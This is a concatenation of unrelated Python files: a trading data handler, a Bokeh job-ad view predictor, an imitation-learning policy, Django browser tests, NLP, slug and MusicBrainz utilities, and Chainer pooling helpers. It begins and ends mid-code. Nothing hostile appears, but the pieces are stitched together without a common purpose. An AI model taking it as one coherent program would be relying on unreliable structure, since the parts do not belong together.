        elif symbol in self._hist_data_dict:
            return self._hist_data_dict[symbol].loc[self._current_time, 'Close']
        elif symbol[:2] in self._hist_data_dict:  # FUT root symbol e.g. CL
            return self._hist_data_dict[symbol[:2]].loc[self._current_time, symbol]
        else:
            return None

    def get_last_timestamp(self, symbol):
        """
        Returns the most recent timestamp for a given ticker, falling back
        to the placeholder tick and finally the board's current time.
        """
        if symbol in self._current_data_dict:
            return self._current_data_dict[symbol].timestamp
        elif self._PLACEHOLDER in self._current_data_dict:
            return self._current_data_dict[self._PLACEHOLDER].timestamp
        else:
            return self._current_time

    def get_current_timestamp(self):
        """Return the timestamp of the most recent tick seen."""
        return self._current_time

    def get_hist_price(self, symbol, timestamp):
        """Return history up to timestamp inclusive; None if symbol unknown."""
        if symbol in self._hist_data_dict:
            return self._hist_data_dict[symbol][:timestamp]  # up to timestamp inclusive
        elif symbol[:2] in self._hist_data_dict:  # FUT root symbol e.g. CL
            return self._hist_data_dict[symbol[:2]][symbol][:timestamp]  # column series up to timestamp inclusive
        else:
            return None

    def get_hist_sym_time_index(self, symbol):
        """
        retrieve historical calendar for a symbol
        this is not look forward
        """
        if symbol in self._hist_data_dict:
            return self._hist_data_dict[symbol].index
        elif symbol[:2] in self._hist_data_dict:  # FUT root symbol e.g. CL
            return self._hist_data_dict[symbol[:2]].index
        else:
            return None

    def get_hist_time_index(self):
        """
        retrieve historical calendar: the sorted union of every registered
        dataset's index (cached after the first call).
        this is not look forward
        """
        if self._data_index is None:
            for _, data in self._hist_data_dict.items():
                if self._data_index is None:
                    self._data_index = data.index
                else:
                    # Fixed: the join result was assigned to a never-read
                    # attribute (_data_index_data_stream), so every calendar
                    # after the first was silently dropped.
                    self._data_index = self._data_index.join(data.index, how='outer', sort=True)
        return self._data_index
# app.py
'''
bokeh serve --show app.py
'''
from numpy.random import random
import pandas as pd
import numpy as np
import tensorflow as tf
from tensorflow import keras
import datetime
from langdetect import detect_langs
from langdetect import DetectorFactory
DetectorFactory.seed = 0 # Deterministic results
import re
from sklearn.metrics.pairwise import cosine_similarity
from bert_embedding import BertEmbedding
from sklearn.preprocessing import OneHotEncoder
from bokeh.io import curdoc
from bokeh.layouts import column, row
from bokeh.plotting import ColumnDataSource, Figure
from bokeh.models.widgets import Select, TextInput, NumberFormatter
import bokeh
import bokeh.plotting
# ---- data loading: job-ad features plus precomputed BERT sentence embeddings ----
df = pd.read_csv('Data/jobcloud_features_v2.csv', delimiter = ';', parse_dates = ['start_dt', 'end_dt'])
dfe = pd.read_csv('Embeddings/sentence_embeddings_en_clean.csv', index_col='Unnamed: 0')
# Concatenate features and embeddings column-wise, then drop duplicate titles
# so the similarity search never suggests the same ad twice
df_dfe = pd.concat([df, dfe], axis = 1)
df_dfe = df_dfe.drop_duplicates(subset='title_clean').reset_index()
df = df_dfe.loc[:, df.columns].copy()
dfe = df_dfe.loc[:, dfe.columns].copy()
print(df.info())
print(dfe.isnull().sum().sum())
del df_dfe
#DAYS = 10
#y_col = '%sd_view_cnt' % DAYS
#df = df.loc[(df['days_online'] >= DAYS) & (df[y_col] <= 7.0)]
############## default values ##############
# Initial widget values shown when the app starts
string_input = 'Data Scientist' #df['title'].values[490]
contract_pct_from = 100
contract_pct_to = 100
package_id = 'D'
city = 'Zürich'
industry_name = 'Industrie diverse'
#package_id = 'B'
TOP_N = 9  # number of similar titles suggested alongside the user's input
############## bert ##############
bert_embedding = BertEmbedding(dtype='float32',
                               model='bert_12_768_12',
                               params_path=None,
                               max_seq_length=25,
                               batch_size=256)
# Model feature columns: categoricals plus engineered title features
features = ['contract_pct_from', 'contract_pct_to', 'month', 'package_id', 'industry_name',# 'days_online',
            'city', 'title_num_words', 'title_aggressive', 'title_female', 'title_percent',
            'title_location', 'title_diploma', 'title_chief', 'title_prob_en',
            'title_prob_de', 'title_prob_fr']
# Same list without the categorical columns (those go through the encoder)
features_no_cat = ['contract_pct_from', 'contract_pct_to',
                   'title_num_words', 'title_aggressive', 'title_female', 'title_percent',
                   'title_location', 'title_diploma', 'title_chief', 'title_prob_en',
                   'title_prob_de', 'title_prob_fr']
embeddings = [str(x) for x in range(768)]  # BERT embedding column names '0'..'767'
# One-hot encoder for the categorical features, fitted on the full dataset
enc = OneHotEncoder(handle_unknown='ignore')
enc.fit(df.loc[:, ['package_id', 'city', 'industry_name', 'month']])
############## functions ##############
def unique(sequence):
    """Return the items of *sequence* in original order with duplicates dropped."""
    observed = set()
    result = []
    for item in sequence:
        if item not in observed:
            observed.add(item)
            result.append(item)
    return result
def get_clean_title(string_input):
    """Normalize a job-ad title for embedding.

    Lower-cases the title and strips gender markers, digits, punctuation,
    diploma keywords and stray single letters; the substitution order is
    significant (e.g. 'm&a' is restored after single-letter removal).
    """
    title = re.sub(r'\BIn\b', '', string_input)
    title = title.lower()
    title = re.sub(r'[^\w&]', ' ', title)
    title = re.sub(r'[0-9]', '', title)
    title = re.sub(r'(\bm\b|\bw\b|\bf\b|\br\b|\bin\b|\binnen\b|\bmw\b|\bdach\b|\bd\b|\be\b|\bi\b)', '', title)
    title = re.sub(r'&a\b', 'm&a', title)
    title = re.sub(r'(\bdipl\b|\bfachausweis\b|\babschluss\b|diplom|phd|msc|\buni\b|\bfh\b|\bfh\b|\beth\b|\btu\b)', '', title)
    title = re.sub(r'[ ]{2,}', ' ', title)
    return title.strip()
def predict_views_from_string(string_input = None,
                              string_input_embedding = None,
                              contract_pct_from=100,
                              contract_pct_to=100,
                              package_id='D',
                              city='Zürich',
                              industry_name='Industrie diverse'):
    """Predict the expected view count for a job-ad title.

    When string_input_embedding is None, title features and a BERT
    embedding are computed from string_input. Otherwise string_input must
    be a title already present in df and its stored features/embedding are
    reused (string_input_embedding then acts only as a flag — callers pass
    True). Returns the model prediction rounded to 2 decimals.
    """
    if string_input_embedding is None:
        month = datetime.datetime.now().strftime('%B')
        title_num_words = len(string_input.split())
        # All-caps titles or an exclamation mark count as "aggressive"
        title_aggressive = (string_input.isupper()) | ('!' in string_input)
        # Gender-inclusive markers such as (m/w), /in, (in)
        if re.compile(r'((m/w)|(w/m)|(m/f)|(h/f)|/ -in|/in|\(in\))').search(string_input):
            title_female = True
        else:
            title_female = False
        title_percent = '%' in string_input
        # Location keywords (German)
        if re.compile(r'(\bRegion\b|\bBezirk\b|\bStadt\b|\bOrt\b)').search(string_input):
            title_location = True
        else:
            title_location = False
        # Diploma / degree keywords
        if re.compile(r'(Dipl\.|Diplom|PhD|MSc|\bUni\b|\bFH\b|\bETH\b|\bTU\b)').search(string_input):
            title_diploma = True
        else:
            title_diploma = False
        # C-level titles: '.' matches any char, so CEO/CTO/CFO etc.
        title_chief = True if re.compile(r'\bC.O\b').search(string_input) else False
        # Language probabilities (en/de/fr) of the raw title
        lang_dict = {'en': 0, 'de':0, 'fr':0}
        for lang_input in detect_langs(string_input):
            if lang_input.lang in lang_dict:
                lang_dict[lang_input.lang] = lang_input.prob
        title_prob_en = lang_dict['en']
        title_prob_de = lang_dict['de']
        title_prob_fr = lang_dict['fr']
        string_input = get_clean_title(string_input)
        # Mean over token embeddings; '_' is a dummy second sentence
        titles_embeddings = bert_embedding([string_input, '_'])
        string_input_embedding = np.mean( np.array(titles_embeddings[0][1]), axis=0 )
        # Single-row frame in the exact features + embeddings column order
        df_input_string = pd.DataFrame([[contract_pct_from, contract_pct_to, month, package_id, industry_name,
                                         city, title_num_words, title_aggressive, title_female, title_percent,
                                         title_location, title_diploma, title_chief, title_prob_en,
                                         title_prob_de, title_prob_fr] + list(string_input_embedding)],
                                       columns = features + embeddings)
    else:
        # Known title: reuse its stored features/embedding, overriding the
        # user-selected categorical inputs below
        df_input_string_ = df.loc[df['title'] == string_input, :].head(1).copy()
        df_input_string = pd.concat([df_input_string_, dfe.loc[df_input_string_.index, :]], axis = 1)
        df_input_string['contract_pct_from'] = contract_pct_from
        df_input_string['contract_pct_to'] = contract_pct_to
        df_input_string['package_id'] = package_id
        df_input_string['city'] = city
        df_input_string['month'] = datetime.datetime.now().strftime('%B')
        df_input_string['industry_name'] = industry_name
    # Numeric features + embeddings concatenated with one-hot categoricals
    X_input = np.concatenate((df_input_string.loc[:, features_no_cat + embeddings].values,
                              enc.transform(df_input_string.loc[:, ['package_id', 'city', 'industry_name', 'month']]).toarray()), axis=1)
    print(round(model.predict(X_input)[0][0], 2))
    return round(model.predict(X_input)[0][0], 2)
def get_most_similar_auto_complete(df : pd.DataFrame,
                                   dfe: pd.DataFrame,
                                   string_input : str,
                                   top_n : int=5,
                                   contract_pct_from=contract_pct_from,
                                   contract_pct_to=contract_pct_to,
                                   package_id=package_id,
                                   city=city,
                                   industry_name=industry_name):
    """Suggest the top_n most similar existing titles and predict views for all.

    Embeds the cleaned input with BERT, ranks stored titles by cosine
    similarity, and returns dict(title=..., pred=..., title_no=...) shaped
    for a ColumnDataSource: the user's own input first, then the similar
    titles, de-duplicated in order.
    """
    string_input_clean = get_clean_title(string_input)
    titles_embeddings = bert_embedding([string_input_clean, '_'])
    string_input_embedding = np.mean( np.array(titles_embeddings[0][1]), axis=0 )
    # Cosine similarity of the input embedding against every stored title
    df_top_n = pd.DataFrame(cosine_similarity(string_input_embedding.reshape(1, -1), dfe.loc[:, :])[0], columns = ['similarity']).sort_values('similarity', ascending = False).head(top_n)
    indeces_most_similar = df_top_n.index
    print(indeces_most_similar)
    print(df_top_n['similarity'])
    print(df.loc[indeces_most_similar, ['title']].values)
    # Input title first, then the similar titles, de-duplicated in order
    titles_to_show = [[string_input]] + list(df.loc[indeces_most_similar, ['title']].values)
    titles_to_show_ = [x[0] for x in titles_to_show]
    titles_to_show_ = unique(titles_to_show_)
    titles_to_show = [[x] for x in titles_to_show_]
    # Full feature pipeline for the free-text input ...
    pred_input = predict_views_from_string(string_input = string_input,
                                           contract_pct_from=contract_pct_from,
                                           contract_pct_to=contract_pct_to,
                                           package_id=package_id,
                                           city=city,
                                           industry_name=industry_name)
    # ... and the stored-feature fast path for the known titles
    preds = [predict_views_from_string(string_input = t[0],
                                       string_input_embedding=True,
                                       contract_pct_from=contract_pct_from,
                                       contract_pct_to=contract_pct_to,
                                       package_id=package_id,
                                       city=city,
                                       industry_name=industry_name) for t in titles_to_show[1:]]
    preds = [pred_input] + preds
    title_no = [str(i+1) for i, t in enumerate(titles_to_show)]
    return dict(title=titles_to_show, pred=preds, title_no = title_no)
############## neural net ##############
def create_model():
    """Build and compile the feed-forward regression net (829 -> 200 -> 1)."""
    layers = [
        tf.keras.layers.Flatten(input_shape=(829, )),
        tf.keras.layers.Dense(200, activation=tf.nn.relu),
        tf.keras.layers.Dropout(0.2),
        tf.keras.layers.Dense(1)
    ]
    net = tf.keras.models.Sequential(layers)
    net.compile(optimizer='adam',
                loss='mean_squared_error',
                metrics=['mean_squared_error'])
    return net
model = create_model()
model.load_weights('Model/')  # pre-trained weights checkpoint directory
############## sources ##############
# Initial table/plot data computed from the default inputs
source3 = ColumnDataSource(data=get_most_similar_auto_complete(df, dfe, string_input, TOP_N))
############## plot ##############
# Categorical y-axis values, listed in descending order
title_no = [str(x) for x in range(TOP_N+1, 0, -1)] #['4', '3', '2', '1']
p = Figure(y_range=title_no, tools="", toolbar_location=None, x_range=[0, 3], x_axis_label='Expected View Count', plot_width=500, plot_height=300)
p.hbar(y = 'title_no', right = 'pred', fill_alpha=0.8, height= 0.1, source=source3)
############## inputs ##############
# One widget per model input; defaults mirror the module-level defaults above
string_input2 = TextInput(value='Data Scientist', title="Enter Your Job Ad Title here")
select_city = Select(options=list(df['city'].unique()), value='Zürich', title='choose a city')
select_package = Select(options=['A', 'B', 'C', 'D'], value='D', title='choose a package')
select_contract_pct_from = Select(options=[str(x) for x in range(10, 110, 10)], value='100', title='choose from %')
select_contract_pct_to = Select(options=[str(x) for x in range(10, 110, 10)], value='100', title='choose to %')
select_industry = Select(options=list(df['industry_name'].unique()), value='Industrie diverse', title='choose an industry')
############## updates ##############
def update_pred(attrname, old, new):
    """Bokeh widget callback: recompute suggestions from the current widget values."""
    source3.data = get_most_similar_auto_complete(
        df, dfe,
        string_input=string_input2.value,
        top_n=TOP_N,
        package_id=select_package.value,
        contract_pct_from=select_contract_pct_from.value,
        contract_pct_to=select_contract_pct_to.value,
        industry_name=select_industry.value,
        city=select_city.value)
# Recompute predictions whenever any widget value changes
string_input2.on_change('value', update_pred)
select_package.on_change('value', update_pred)
select_contract_pct_from.on_change('value', update_pred)
select_contract_pct_to.on_change('value', update_pred)
select_industry.on_change('value', update_pred)
select_city.on_change('value', update_pred)
############## tables ##############
columns = [bokeh.models.TableColumn(field="title", title="title"),
           bokeh.models.TableColumn(field="pred", title="pred", formatter=NumberFormatter(format='0[.]00)')),
           bokeh.models.TableColumn(field="title_no", title="title_no")]
data_table = bokeh.models.DataTable(source=source3, width=400, height=280,
                                    columns =columns)
# Layout: widgets on the left, table in the middle, bar plot on the right
layout = row(column(select_city,
                    select_industry,
                    string_input2,
                    select_package,
                    select_contract_pct_from,
                    select_contract_pct_to),
             column(data_table),
             column(row(height= 20), row(p))) #, height=200
curdoc().add_root(layout)
from __future__ import division
import time
from pyglet.window import key as pygkey
import tensorflow as tf
import numpy as np
import scipy.special
from .models import TFModel
from . import utils
from . import encoder_models
class MLPPolicy(TFModel):
    """Feed-forward imitation policy.

    Builds train/eval logits over an observation placeholder and an
    imitation loss: softmax cross-entropy for discrete actions, MSE for
    continuous ones, optionally reweighted per example via bal_val_of_act.
    """
    def __init__(
        self,
        *args,
        n_obs_dims,
        n_act_dims,
        discrete_act=True,
        bal_val_of_act=None,
        n_layers=2,
        layer_size=32,
        **kwargs
    ):
        super().__init__(*args, **kwargs)
        # Normalize observation dims to a shape tuple
        if type(n_obs_dims) != tuple:
            n_obs_dims = (n_obs_dims,)
        # Default balancing key for discrete actions: the one-hot argmax
        if bal_val_of_act is None and discrete_act:
            bal_val_of_act = lambda act: np.argmax(act, axis=1)
        self.n_layers = n_layers
        self.layer_size = layer_size
        self.n_act_dims = n_act_dims
        self.bal_val_of_act = bal_val_of_act
        self.discrete_act = discrete_act
        self.n_obs_dims = n_obs_dims
        self.data_keys = ['obses', 'actions']
        # Placeholders: observations, target actions, per-example weights
        self.obs_ph = tf.placeholder(tf.float32, [None] + list(n_obs_dims))
        self.act_ph = tf.placeholder(tf.float32, [None, n_act_dims])
        self.weights_ph = tf.placeholder(tf.float32, [None])
        # Separate train/eval graphs over the same observation placeholder
        self.logits = self.build_model(self.obs_ph, is_train=True)
        self.eval_logits = self.build_model(self.obs_ph, is_train=False)
        def build_losses(logits):
            # Cross-entropy for discrete actions, per-dim MSE otherwise
            if self.discrete_act:
                losses = tf.nn.softmax_cross_entropy_with_logits(labels=self.act_ph, logits=logits)
            else:
                losses = tf.reduce_mean((self.act_ph - logits)**2, axis=1)
            if self.bal_val_of_act is not None:
                # Weighted mean using the class-balancing weights
                weights = self.weights_ph
                loss = tf.reduce_sum(weights * losses) / tf.reduce_sum(weights)
            else:
                loss = tf.reduce_mean(losses)
            return loss
        self.loss = build_losses(self.logits)
        self.eval_loss = build_losses(self.eval_logits)
    def act(self, obses, batch_size=32):
        """Run eval logits over obses in batches; normalized to
        log-probabilities when actions are discrete."""
        def op(batch):
            feed_dict = {self.obs_ph: batch}
            return self.sess.run(self.eval_logits, feed_dict=feed_dict)
        logits = utils.batch_op(obses, batch_size, op)
        if self.discrete_act:
            # Subtract logsumexp so rows become log-probabilities
            logits -= scipy.special.logsumexp(logits, axis=1, keepdims=True)
        return logits
    def eval_log_prob(self, obses, acts):
        """Log-probability of acts (discrete) or negative MSE (continuous)."""
        logits = self.act(obses)
        if self.discrete_act:
            return np.sum(acts*logits, axis=1)
        else:
            return -np.mean((acts-logits)**2, axis=1)
    def format_batch(self, batch):
        """Build the feed dict for one training batch, adding balancing
        weights when bal_val_of_act is configured."""
        batch_actions = batch['actions']
        feed_dict = {
            self.obs_ph: batch['obses'],
            self.act_ph: batch_actions
        }
        if self.bal_val_of_act is not None:
            bal_weights = utils.bal_weights_of_batch(self.bal_val_of_act(batch_actions))
            feed_dict[self.weights_ph] = bal_weights
        return feed_dict
    def build_model(self, obs, eps=1e-9, is_train=True):
        """Build the MLP head mapping observations to action logits.

        Note: eps and is_train are unused here; subclasses override this
        (e.g. ConvPolicy uses is_train for its encoder).
        """
        return utils.build_mlp(
            obs,
            self.n_act_dims,
            self.scope,
            n_layers=self.n_layers,
            size=self.layer_size,
            activation=tf.nn.relu,
            output_activation=None
        )
class ConvPolicy(MLPPolicy):
    """MLPPolicy variant for image observations: scales pixels into [0, 1] and
    feeds them through a convolutional encoder before the MLP head."""
    def act(self, obses):
        # Pixels arrive as integers in [0, 255]; normalize before inference.
        return super().act(obses.astype(float) / 255.)
    def format_batch(self, batch):
        # Apply the same normalization used at inference time.
        batch['obses'] = batch['obses'].astype(float) / 255.
        return super().format_batch(batch)
    def build_model(self, obs, is_train=True):
        # Encode images first, then let the parent MLP map encodings to logits.
        with tf.variable_scope(self.scope, reuse=tf.AUTO_REUSE):
            logits = encoder_models.build_celeba_encoder(obs, self.n_act_dims, is_train=is_train)
        return super().build_model(logits, is_train=is_train)
class HumanCarUser(object):
    """Keyboard-driven car controller: arrow keys steer, throttle pulses on a
    fixed schedule. The action vector is [steer, gas, brake]."""

    def __init__(self):
        # Fixed control magnitudes and the length (in steps) of each throttle phase.
        self.acc_mag = 1
        self.steer_mag = 0.5
        self.init_acc_period = 100
        self.action = None
        self.curr_step = None

    def reset(self, *args, **kwargs):
        """Start a new episode with a zeroed action and step counter."""
        self.curr_step = 0
        self.action = np.zeros(3)

    def __call__(self, *args, **kwargs):
        """Return the current action; throttle alternates on/off every init_acc_period steps."""
        phase = self.curr_step % (2 * self.init_acc_period)
        self.action[1] = self.acc_mag if phase < self.init_acc_period else 0
        self.curr_step += 1
        time.sleep(0.1)
        return self.action

    def key_press(self, key, mod):
        """Set steering while a left/right arrow key is held."""
        code = int(key)
        if code == pygkey.LEFT:
            self.action[0] = -self.steer_mag
        elif code == pygkey.RIGHT:
            self.action[0] = self.steer_mag

    def key_release(self, key, mod):
        """Recenter steering only if the released key is the one currently steering."""
        code = int(key)
        released_left = code == pygkey.LEFT and self.action[0] == -self.steer_mag
        released_right = code == pygkey.RIGHT and self.action[0] == self.steer_mag
        if released_left or released_right:
            self.action[0] = 0
|
import numpy as np
def hartmann3(x):
    """Hartmann 3-D test function (positive form, no leading minus sign).

    Computes sum_i alpha_i * exp(-sum_j A[i, j] * (x[j] - P[i, j])**2)
    for a 3-element point x.
    """
    alpha = np.array([1.0, 1.2, 3.0, 3.2])
    A = np.array([[3.0, 10.0, 30.0],
                  [0.1, 10.0, 35.0],
                  [3.0, 10.0, 30.0],
                  [0.1, 10.0, 35.0]])
    P = 0.0001 * np.array([[3689, 1170, 2673],
                           [4699, 4387, 7470],
                           [1090, 8732, 5547],
                           [381, 5743, 8828]])
    point = np.asarray(x, dtype=float)
    # Vectorized over the four mixture components; equivalent to the double loop.
    exponents = np.sum(A * (point - P) ** 2, axis=1)
    return np.dot(alpha, np.exp(-exponents))
|
import os
import subprocess
from sys import stdout, stderr
from channels.testing import ChannelsLiveServerTestCase
from django.conf import settings
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.core.cache import cache
from splinter import Browser
from django.urls import reverse
from programdom.models import Workshop
from tests.generators.user import AuthUserFactory
# Project-wide toggle for running splinter browsers headless.
HEADLESS = settings.HEADLESS
class AuthedSplinterTestCase(ChannelsLiveServerTestCase):
    """Live-server test case that logs a freshly created user in through the UI.

    Opens a Chrome splinter browser and performs a real login via the
    users:login form before each test.
    """

    def setUp(self):
        # Honor the project-wide HEADLESS setting instead of hard-coding True.
        self.browser = Browser('chrome', headless=HEADLESS)
        user = AuthUserFactory()
        self.browser.visit(f'{self.live_server_url}{reverse("users:login")}')
        self.browser.fill('username', user.username)
        # AuthUserFactory creates users with the fixed password "password".
        self.browser.fill('password', "password")
        self.browser.find_by_text("Login")[0].click()

    def tearDown(self):
        self.browser.quit()
class StudentSplinterTestCase(ChannelsLiveServerTestCase):
    """Live-server test case that joins workshop #1 as an anonymous student.

    Starts the fixture workshop and authenticates through the workshop code form.
    """

    fixtures = ['workshops', "languages", "problems", "problem_tests"]

    def setUp(self):
        # Honor the project-wide HEADLESS setting instead of hard-coding True.
        self.browser = Browser('chrome', headless=HEADLESS)
        self.browser.visit(f'{self.live_server_url}{reverse("workshop_auth")}')
        self.workshop = Workshop.objects.get(pk=1)
        self.workshop.start()
        self.browser.fill('code', self.workshop.code)
        self.browser.click_link_by_id("submit-id-submit")

    def tearDown(self):
        self.browser.quit()
class WithBridgeTestCase(AuthedSplinterTestCase):
    """Authed test case that also runs the judgebridge worker as a subprocess."""

    bridge_process = None

    def setUp(self):
        # Clear the cache so state from earlier tests cannot leak into this one.
        cache.clear()
        super().setUp()

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        env = os.environ.copy()
        env["DATABASE_URL"] = "postgresql://postgres@localhost:5432/" + settings.DATABASES['default']['NAME']
        # Forward the worker's output to this process's streams. Passing them to
        # Popen is required; assigning Popen.stdout/stderr after creation (as the
        # previous code did) has no effect on where the child writes.
        cls.bridge_process = subprocess.Popen(
            ["python", "manage.py", "runworker", "judgebridge"],
            env=env, stdout=stdout, stderr=stderr)

    @classmethod
    def tearDownClass(cls):
        cls.bridge_process.terminate()
        # Reap the child so it does not linger as a zombie process.
        cls.bridge_process.wait()
        super().tearDownClass()
|
from dataclasses import dataclass
from collections import Counter
from pathlib import Path
from typing import List
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk import RegexpTokenizer
# Module-level NLP helpers, built once: \w+ tokenizer, English stopword set,
# and a WordNet lemmatizer shared by word_count().
tokenizer = RegexpTokenizer(r"\w+")
stop_words_en = set(stopwords.words("english"))
wordnet_lemmatizer = WordNetLemmatizer()
@dataclass
class WordAnalysis:
    """Result of a word-count analysis over one text file."""
    # Total number of tokens in the text (including stopwords).
    word_count: int
    # Number of distinct lemmatized, non-stopword tokens.
    unique_word_count: int
    # Up to 10 most frequent lemmatized, non-stopword tokens.
    top_words: List[str]
def word_count(filepath: Path) -> WordAnalysis:
    """
    Perform a naive word count analysis on the UTF-8 text file at *filepath*.

    ``word_count`` counts every token, while ``unique_word_count`` and
    ``top_words`` are computed over lemmatized tokens with English stopwords
    removed (case-insensitively).
    """
    content = filepath.read_text("utf-8")
    word_tokens = tokenizer.tokenize(content)
    # Lemmatize so inflected forms ("cats"/"cat") collapse to one entry.
    lemms = [wordnet_lemmatizer.lemmatize(word) for word in word_tokens]
    # Drop stopwords before counting frequencies.
    counter = Counter([lem for lem in lemms if lem.lower() not in stop_words_en])
    top_words = list([word for word, _count in counter.most_common(10)])
    return WordAnalysis(
        word_count=len(word_tokens),
        unique_word_count=len(counter),
        top_words=top_words,
    )
|
import random
import string
from django.utils.text import slugify
def get_random_string(size=4, chars=string.ascii_lowercase + string.digits):
    """Return a random string of *size* characters drawn (with replacement) from *chars*."""
    return "".join(random.choice(chars) for _ in range(size))
def get_unique_slug(instance, new_slug=None, size=10, max_size=30):
    """
    Build a slug for instance.title that is unique among its siblings.

    On a collision, recurse with the slugified title plus a random suffix.

    :param instance: model instance with a `title` field (and optionally a `parent`)
    :param new_slug: candidate slug from a previous (recursive) attempt
    :param size: length of the random suffix appended on collision
    :param max_size: maximum slug length applied before the uniqueness check
    :return: a slug unique within the relevant queryset
    """
    title = instance.title
    # First attempt slugifies the title; recursive attempts reuse the candidate.
    slug = slugify(title) if new_slug is None else new_slug
    # Truncate on every path (previously only recursive candidates were truncated).
    slug = slug[:max_size]
    Klass = instance.__class__  # Playlist, Category
    # Not every model has a parent relation; tolerate its absence or an unset FK.
    try:
        parent = instance.parent
    except Exception:
        parent = None
    if parent is not None:
        qs = Klass.objects.filter(parent=parent, slug=slug)  # smaller
    else:
        qs = Klass.objects.filter(slug=slug)  # larger
    if qs.exists():
        new_slug = slugify(title) + get_random_string(size=size)
        return get_unique_slug(instance, new_slug=new_slug)
    return slug
import numpy as np
import nose
import nibabel as nib
from nose.tools import assert_true, assert_false, assert_equal, assert_almost_equal
from numpy.testing import assert_array_equal, assert_array_almost_equal
from dipy.sims.voxel import SingleTensor, multi_tensor_odf, all_tensor_evecs
from dipy.core.geometry import vec2vec_rotmat
from dipy.data import get_data, get_sphere
from dipy.viz import fvtk
def diff2eigenvectors(dx, dy, dz, basis=None):
    """ numerical derivatives 2 eigenvectors

    The normalized derivative vector (dx, dy, dz) becomes the first
    eigenvector; the other two are the reference basis columns rotated by
    the rotation mapping basis[:, 0] onto it.

    Parameters
    ----------
    basis : 3x3 array, optional
        Reference frame; defaults to the identity. The original code read an
        undefined module-level ``basis`` (a NameError on every call), so this
        makes the dependency explicit — TODO confirm the intended frame.

    Returns
    -------
    eigs : 3x3 array with eigenvectors as columns
    R : the rotation matrix used
    """
    if basis is None:
        basis = np.eye(3)
    u = np.array([dx, dy, dz])
    u = u / np.linalg.norm(u)
    R = vec2vec_rotmat(basis[:, 0], u)
    eig0 = u
    eig1 = np.dot(R, basis[:, 1])
    eig2 = np.dot(R, basis[:, 2])
    eigs = np.zeros((3, 3))
    eigs[:, 0] = eig0
    eigs[:, 1] = eig1
    eigs[:, 2] = eig2
    return eigs, R
def test_single_tensor():
    """Smoke-test SingleTensor signal simulation on the bundled 64-direction data."""
    fimg,fbvals,fbvecs=get_data('small_64D')
    bvals=np.load(fbvals)
    bvecs=np.load(fbvecs)
    #bvals=np.loadtxt(fbvals)
    #bvecs=np.loadtxt(fbvecs).T
    img=nib.load(fimg)
    data=img.get_data()
    # Prolate tensor: principal eigenvalue 4x the radial ones.
    evals=np.array([1.4,.35,.35])*10**(-3)
    evecs=np.eye(3)
    S=SingleTensor(bvals,bvecs,100,evals,evecs,snr=None)
    """
    colours=fvtk.colors(S,'jet')
    r=fvtk.ren()
    fvtk.add(r,fvtk.point(bvecs,colours))
    fvtk.show(r)
    """
def test_multi_tensor():
    """Check multi_tensor_odf output shape and that ODF values lie in [0, 1]."""
    vertices, faces = get_sphere('symmetric724')
    # Two identical prolate fiber populations, crossing at 90 degrees.
    mevals=np.array(([0.0015, 0.0003, 0.0003],
                     [0.0015, 0.0003, 0.0003]))
    e0 = np.array([1, 0, 0.])
    e1 = np.array([0., 1, 0])
    mevecs=[all_tensor_evecs(e0), all_tensor_evecs(e1)]
    # Equal 50/50 volume fractions for the two compartments.
    odf = multi_tensor_odf(vertices, [0.5,0.5], mevals, mevecs)
    assert odf.shape == (len(vertices),)
    assert np.all(odf <= 1) & np.all(odf >= 0)
if __name__ == "__main__":
    # Run both tests when executed directly (previously only the first ran).
    test_single_tensor()
    test_multi_tensor()
|
"""
Musicbrainz related functions.
"""
import musicbrainzngs as mus
#from __init__ import __version__
from .__init__ import __version__
def init():
    """Register this client's user-agent string with the musicbrainz API."""
    app_name = "python-bum: A cover art daemon."
    contact = "https://github.com/dylanaraps/bum"
    mus.set_useragent(app_name, __version__, contact)
def get_cover(song, size=250):
    """Download cover art for *song* (a dict with "artist" and "album" keys).

    Returns the image bytes on success, or None when no art could be found.
    Retries once more on a network error.
    """
    try:
        data = mus.search_releases(artist=song["artist"],
                                   release=song["album"],
                                   limit=1)
        release_list = data.get("release-list") or []
        if not release_list:
            # Nothing matched the search: no art to download.
            print("error: Couldn't find album art for",
                  f"{song['artist']} - {song['album']}")
            return None
        release_id = release_list[0]["release-group"]["id"]
        print(f"album: Using release-id: {release_list[0]['id']}")
        return mus.get_release_group_image_front(release_id, size=size)
    except mus.NetworkError:
        # Propagate the retry's result; the original dropped the return value,
        # so a successful retry still returned None to the caller.
        return get_cover(song, size)
    except mus.ResponseError:
        print("error: Couldn't find album art for",
              f"{song['artist']} - {song['album']}")
|
import numpy
import math
import random
# NOTE(review): unused — spawner() assigns a *local* of the same name.
spawn_position = 0
def spawner_function(x):
    """Return y = 4*x**2 + 1.

    The original used ``x ^ 2`` — bitwise XOR, not squaring — which is
    inconsistent with spawner_function_invrt, the declared inverse
    (x = sqrt(|y - 1| / 4)).
    """
    y = 4 * (x ** 2) + 1
    return y
def spawner_function_invrt(y):
    """Inverse of y = 4*x**2 + 1: return x = sqrt(|y - 1| / 4)."""
    return math.sqrt(abs((y - 1) / 4))
def spawner(current_position):
    """Sample a spawn position by inverting the spawner curve at a random y in [0, 400).

    Note: current_position is currently unused by the sampling logic.
    """
    sampled_y = random.random() * 400
    spawn_position = int(spawner_function_invrt(sampled_y))
    return spawn_position
# Demo: print one sampled spawn position (the argument is currently ignored).
print(spawner(10))
|
import math
import chainer
def to_tuple(cand):
    """Return cand unchanged if it is already a tuple, else duplicate it as (cand, cand)."""
    return cand if isinstance(cand, tuple) else (cand, cand)
def factor(shape, ksize, stride, pad):
    """Return sqrt of the per-window output-position count of a 2-D pooling op.

    shape is (N, C, H, W); ksize/stride/pad may be ints or (h, w) tuples.
    """
    kh, kw = ksize if isinstance(ksize, tuple) else (ksize, ksize)
    sh, sw = stride if isinstance(stride, tuple) else (stride, stride)
    ph, pw = pad if isinstance(pad, tuple) else (pad, pad)
    rows = math.ceil(min(kh, shape[2] + ph * 2 - kh + 1) / sh)
    cols = math.ceil(min(kw, shape[3] + pw * 2 - kw + 1) / sw)
    return math.sqrt(rows * cols)
def max_pooling_2d(x, ksize, stride, pad=0, cover_all=True):
    """Max-pool the (data, t, l) triple, scaling l by the pooling factor."""
    data, t, lip = x
    lip = lip * factor(data.shape, ksize, stride, pad)
    pooled = chainer.functions.max_pooling_2d(
        data, ksize=ksize, stride=stride, pad=pad, cover_all=cover_all)
    return pooled, t, lip
def average_pooling_2d(x, ksize, stride, pad=0):
    """Average-pool the (data, t, l) triple, scaling l by the pooling factor
